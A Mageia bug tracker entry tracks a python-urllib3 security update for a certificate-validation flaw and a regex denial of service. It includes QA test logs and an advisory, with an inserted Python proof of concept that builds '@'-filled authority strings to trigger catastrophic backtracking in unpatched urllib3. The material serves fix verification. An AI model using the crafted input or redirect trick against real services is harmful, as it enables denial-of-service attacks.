Bug 29041 - python-urllib3 new security issues CVE-2021-28363 and CVE-2021-33503
Summary: python-urllib3 new security issues CVE-2021-28363 and CVE-2021-33503
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 8
Hardware: All
OS: Linux
Priority: Normal
Severity: major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard: MGA8-64-OK
Keywords: advisory, validated_update
Depends on:
Blocks:
 
Reported: 2021-05-30 04:15 CEST by David Walser
Modified: 2021-07-27 22:23 CEST
CC: 7 users

See Also:
Source RPM: python-urllib3-1.26.2-1.mga8.src.rpm
CVE: CVE-2021-28363, CVE-2021-33503
Status comment:


Attachments

Description David Walser 2021-05-30 04:15:15 CEST
Fedora has issued an advisory on May 24:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL/

That is for python-pip (see Bug 29010), but it fixes an issue in python-urllib3, which is bundled in pip.

The issue is fixed upstream in 1.26.4.

Mageia 8 is also affected.
David Walser 2021-05-30 04:15:40 CEST

See Also: (none) => https://bugs.mageia.org/show_bug.cgi?id=29010
Whiteboard: (none) => MGA8TOO
Status comment: (none) => Fixed upstream in 1.26.4

David Walser 2021-05-30 04:16:03 CEST

CC: (none) => bruno

Comment 1 Aurelien Oudelet 2021-05-30 16:14:18 CEST
Assigning.

Assignee: bugsquad => python
CC: (none) => ouaurelien

Comment 2 David Walser 2021-06-21 19:40:57 CEST
SUSE has issued an advisory on June 18:
https://lists.suse.com/pipermail/sle-security-updates/2021-June/009038.html

The issue is fixed upstream in 1.26.5:
https://github.com/advisories/GHSA-q2q7-5pp4-w6pg

Mageia 7 and Mageia 8 are also affected.

Summary: python-urllib3 new security issue CVE-2021-28363 => python-urllib3 new security issues CVE-2021-28363 and CVE-2021-33503
Status comment: Fixed upstream in 1.26.4 => Fixed upstream in 1.26.5
Whiteboard: MGA8TOO => MGA8TOO, MGA7TOO

Comment 3 David Walser 2021-06-21 20:02:34 CEST
Fedora has issued an advisory for CVE-2021-33503 on June 19:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JWEE334W43EIJUKSMQSEH6ML7VU57K5B/
Comment 4 David Walser 2021-06-27 22:02:34 CEST
pip 21.1 updates urllib3 to 1.26.4, but as of pip 21.1.2, urllib3 still hasn't been updated to 1.26.5 to address CVE-2021-33503.  The python-urllib3 package itself has been updated to 1.26.5 in Cauldron.
Comment 5 David Walser 2021-06-27 22:10:01 CEST
The first part of the patch in this commit:
https://src.fedoraproject.org/rpms/mingw-python-urllib3/c/370b56fc70416e75e1ad05ec4449ae7624e0e991?branch=f34

can be added to patch pip-21.1.2/src/pip/_vendor/urllib3

but I'm sure it'll be fixed upstream in pip before long.

For slightly older pips, Fedora's patch could be used as a starting point:
https://src.fedoraproject.org/rpms/python-pip/c/e36c561614df9a20c4ec1b9b9100f271d210ceb9?branch=f34
Comment 6 David Walser 2021-07-01 18:56:09 CEST
Removing Mageia 7 from whiteboard due to EOL:
https://blog.mageia.org/en/2021/06/08/mageia-7-will-reach-end-of-support-on-30th-of-june-the-king-is-dead-long-live-the-king/

Whiteboard: MGA8TOO, MGA7TOO => MGA8TOO

Comment 7 David Walser 2021-07-04 21:17:06 CEST
Fedora has issued an advisory for this today (July 4):
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FMUGWEAUYGGHTPPXT6YBD53WYXQGVV73/
Comment 8 David Walser 2021-07-12 17:25:13 CEST
openSUSE has issued an advisory for the second CVE on July 10:
https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NYARUF6IH56FOIKBV7PTO7AXODL5GKNT/
Comment 9 David Walser 2021-07-23 17:50:23 CEST
python-pip in Cauldron has been patched to fix CVE-2021-33503.

Source RPM: python-urllib3-1.26.2-3.mga9.src.rpm => python-urllib3-1.26.2-1.mga8.src.rpm
Whiteboard: MGA8TOO => (none)
CC: (none) => mageia
Version: Cauldron => 8

Comment 10 Jani Välimaa 2021-07-26 16:37:21 CEST
Pushed python-urllib3-1.26.5-1.mga8 to core/updates_testing.

SRPM(S):
python-urllib3-1.26.5-1.mga8

RPM(S):
python3-urllib3-1.26.5-1.mga8

CC: (none) => jani.valimaa
Assignee: python => qa-bugs

Comment 11 David Walser 2021-07-26 16:40:13 CEST
Thanks Jani!

Some more references:
https://github.com/urllib3/urllib3/releases/tag/1.26.3
https://github.com/urllib3/urllib3/releases/tag/1.26.4
https://github.com/urllib3/urllib3/releases/tag/1.26.5

Status comment: Fixed upstream in 1.26.5 => (none)

Comment 12 Len Lawrence 2021-07-27 01:01:26 CEST
mga8, x64

CVE-2021-33503
https://src.fedoraproject.org/rpms/python-urllib3/pull-request/16
Shows poc test.  No poc file though (upstream - where is that?).
It appears that the poc is buried in the patch ->
https://src.fedoraproject.org/rpms/python-urllib3/pull-request/16#_1
The upstream quote shows over 4 minutes for a GET request before and a split second after the update.  We shall have to take their word for it.

$ rpm -q python3-urllib3
python3-urllib3-1.26.2-1.mga8

https://github.com/urllib3/urllib3
simple tests:
$ python
>>> import urllib3
>>> http = urllib3.PoolManager()
>>> resp = http.request("GET", "http://httpbin.org/robots.txt")
>>> resp.status
200
>>> resp.data
b'User-agent: *\nDisallow: /deny\n'
>>> exit()

Updated the package.
$ urpmq --whatrequires python3-urllib3 | sort -u
buku
meteo-qt
python3-botocore
python3-conda
python3-coveralls
python3-dulwich
python3-requests
python3-requests-unixsocket
python3-responses
python3-selenium
sansimera-qt
transifex-client

Installed buku, a browser bookmarks manager.
$ buku --ai
<Answered questions and picked Firefox browser.  Bookmarks imported to database.>
$ strace -o buku.trace buku
a <open all results in browser>
 s extrasolar

1. The Extrasolar Planets Encyclopaedia [153]
   > http://exoplanet.eu/
   # 2021jul26,menu

2. systemic [378]
   > http://www.oklo.org/
   # 2021jul26,astro,extrasolar,menu

3. systemic - Downloadable Console [379]
   > http://www.oklo.org/?page_id=86
   # 2021jul26,astro,extrasolar,menu

4. HubbleSite - NewsCenter - 'Survivor' Planets: Astronomers Witness First Steps of Planet Growth - and Destruction (04/26/2001) - Introduction [380]
   > http://hubblesite.org/newscenter/archive/releases/2001/13
   # 2021jul26,astro,extrasolar,menu

<and so on>

0 4
<That opened https://hubblesite.org/news/news-releases which contained the item required>

s mageia updates <returned 164 results>

0 6 <switched to Mageia identity management>

^D to exit.

That works as far as it went.

$ grep urllib3 buku.trace
<lots of entries>
openat(AT_FDCWD, "/usr/lib/python3.8/site-packages/urllib3/__pycache__/__init__.cpython-38.pyc", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/usr/lib/python3.8/site-packages/urllib3", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3

This will do.

CC: (none) => tarazed25
Whiteboard: (none) => MGA8-64-OK

Comment 13 Thomas Andrews 2021-07-27 03:42:54 CEST
Validating.

CC: (none) => andrewsfarm, sysadmin-bugs
Keywords: (none) => validated_update

Comment 14 Aurelien Oudelet 2021-07-27 20:41:20 CEST
type: security
subject: Updated python-urllib3 package fixes security vulnerabilities
CVE:
 - CVE-2021-28363
 - CVE-2021-33503
src:
  8:
   core:
     - python-urllib3-1.26.5-1.mga8
description: |
  The urllib3 library 1.26.x before 1.26.4 for Python omits SSL certificate
  validation in some cases involving HTTPS to HTTPS proxies. The initial
  connection to the HTTPS proxy (if an SSLContext isn't given via proxy_config)
  doesn't verify the hostname of the certificate. This means certificates for
  different servers that still validate properly with the default urllib3
  SSLContext will be silently accepted (CVE-2021-28363).
  
  An issue was discovered in urllib3 before 1.26.5. When provided with a URL
  containing many @ characters in the authority component, the authority regular
  expression exhibits catastrophic backtracking, causing a denial of service if
  a URL were passed as a parameter or redirected to via an HTTP redirect
  (CVE-2021-33503).
references:
 - https://bugs.mageia.org/show_bug.cgi?id=29041
 - https://github.com/urllib3/urllib3/releases/tag/1.26.3
 - https://github.com/urllib3/urllib3/releases/tag/1.26.4
 - https://github.com/urllib3/urllib3/releases/tag/1.26.5
 - https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NYARUF6IH56FOIKBV7PTO7AXODL5GKNT/
 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/FMUGWEAUYGGHTPPXT6YBD53WYXQGVV73/
 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JWEE334W43EIJUKSMQSEH6ML7VU57K5B/
 - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4S65ZQVZ2ODGB52IC7VJDBUK4M5INCXL/

Keywords: (none) => advisory
CVE: (none) => CVE-2021-28363, CVE-2021-33503
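
The second issue in the advisory above (CVE-2021-33503, catastrophic backtracking when the authority component holds many `@` characters) can be checked offline without installing either urllib3 version, which also answers the "where is the PoC?" question from the QA comment. The block below is an added example, not code from this bug report or from urllib3 itself. Its two regexes are a simplified reconstruction of the authority handling in urllib3 1.26.4 (a single regex with a greedy `(.*)@` userinfo prefix in front of the host pattern) and 1.26.5 (userinfo split off with `str.rpartition("@")` before any regex runs); the IPv6 host alternative is dropped for brevity, the function names are this example's own, and the crafted authority string is constructed here. Treat the reconstruction as an assumption and compare it with the 1.26.5 release tag in the references before relying on it.

```python
"""Offline reproduction of the CVE-2021-33503 authority-splitting slowdown.

Added example: the patterns below are a simplified reconstruction of
urllib3's util/url.py before and after 1.26.5 (assumption, verify upstream),
not a copy of the library. The IPv6 alternative is omitted; it does not take
part in the backtracking.
"""
import re
import time

_IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
# reg-name allows any byte except a few delimiters, so '@' is a legal host
# character; that is what lets the greedy userinfo prefix and the host
# pattern fight over a long run of '@'.
_REG_NAME_PAT = r"(?:[^\[\]%:/?#]|%[a-fA-F0-9]{2})*"
_HOST_PAT = "%s|%s" % (_REG_NAME_PAT, _IPV4_PAT)

# Pre-1.26.5 shape: userinfo, host and port matched by one regex.
_SUBAUTHORITY_RE = re.compile(
    r"^(?:(.*)@)?(%s)(?::([0-9]{0,5}))?$" % _HOST_PAT, re.UNICODE | re.DOTALL
)
# 1.26.5 shape: the regex only ever sees the host[:port] remainder.
_HOST_PORT_RE = re.compile(
    r"^(%s)(?::([0-9]{0,5}))?$" % _HOST_PAT, re.UNICODE | re.DOTALL
)


def split_authority_vulnerable(authority):
    """(userinfo, host, port) via the single-regex approach."""
    m = _SUBAUTHORITY_RE.match(authority)
    if m is None:
        raise ValueError("invalid authority: %r" % authority[:40])
    auth, host, port = m.groups()
    return auth, host, port


def split_authority_fixed(authority):
    """(userinfo, host, port) with userinfo split off first, as in 1.26.5."""
    auth, _, host_port = authority.rpartition("@")
    auth = auth or None
    m = _HOST_PORT_RE.match(host_port)
    if m is None:
        raise ValueError("invalid authority: %r" % authority[:40])
    host, port = m.groups()
    return auth, host, port


def crafted_authority(n):
    """Constructed input: n '@' bytes followed by a byte that cannot end a
    host ('%' without two hex digits), so every split point is retried."""
    return "@" * n + "%"


def rejects(fn, authority):
    """True if fn raises ValueError for the authority (both versions should)."""
    try:
        fn(authority)
    except ValueError:
        return True
    return False


def time_split(fn, authority):
    """Seconds spent in fn(authority), whether it returns or raises."""
    start = time.perf_counter()
    try:
        fn(authority)
    except ValueError:
        pass
    return time.perf_counter() - start


if __name__ == "__main__":
    # Doubling n roughly quadruples the vulnerable time; the fixed splitter
    # stays flat because rpartition leaves the regex a one-byte string.
    for n in (1000, 2000, 4000):
        a = crafted_authority(n)
        print("n=%5d  vulnerable=%.3fs  fixed=%.6fs" % (
            n,
            time_split(split_authority_vulnerable, a),
            time_split(split_authority_fixed, a),
        ))
```

The same crafted string reaches the parser through a `Location` header on a followed redirect, not only through a URL the application passes in, which is why the advisory lists both vectors. To test an installed package rather than the reconstruction, feed `urllib3.util.parse_url("http://" + crafted_authority(n))` the same growing `n` and watch whether the time grows quadratically.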

Comment 15 Mageia Robot 2021-07-27 22:23:27 CEST
An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2021-0377.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

